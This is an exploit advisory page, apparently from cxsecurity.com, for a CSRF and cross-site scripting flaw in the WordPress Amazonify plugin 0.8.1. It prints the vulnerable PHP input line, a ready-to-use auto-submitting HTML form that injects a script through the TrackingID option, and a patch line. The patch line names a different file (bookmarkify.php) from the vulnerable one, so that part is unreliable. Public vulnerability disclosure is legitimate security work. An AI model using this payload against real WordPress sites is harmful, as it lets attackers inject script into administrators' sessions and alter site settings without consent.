Wordpress Amazonify Plug-in XSS/CSRF

2015.08.21
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352

###################### # Exploit Title : Wordpress Amazonify Plug-in XSS/CSRF # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://wordpress.org/plugins/amazonify/ # Date: 2015-08-20 # Tested On : Windows7 # Software Link : https://downloads.wordpress.org/plugin/amazonify.zip # Version : 0.8.1 ###################### # Vulnerable Code: File: amazonify.php - Line 173 <input id="TrackingID" name="TrackingID" type="text" value="<?php echo $tracking_id; ?>"> ###################### # Exploit: <form name="form1" method="POST" action="http://[URL]/[Path]/wp-admin/options-general.php?page=amazonify.php"> <input id="TrackingID" name="TrackingID" type="hidden" value='"><script>alert(/Ehsan Ice/)</script>'> <input type="hidden" id="ProductPreview" name="ProductPreview" value="1" > <input type="hidden" id="ContextLink" name="ContextLink" value="1" > <input name="AmazonifyUpdate" type="hidden" value="Update Options &raquo;"> </form> <script language="Javascript"> setTimeout('form1.submit()', 1); </script> ###################### # Patch: File: bookmarkify.php - Line 906 <input id="TrackingID" name="TrackingID" type="text" value="<?php echo htmlspecialchars($tracking_id); ?>"> ###################### # Discovered By : Ehsan Hosseini ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top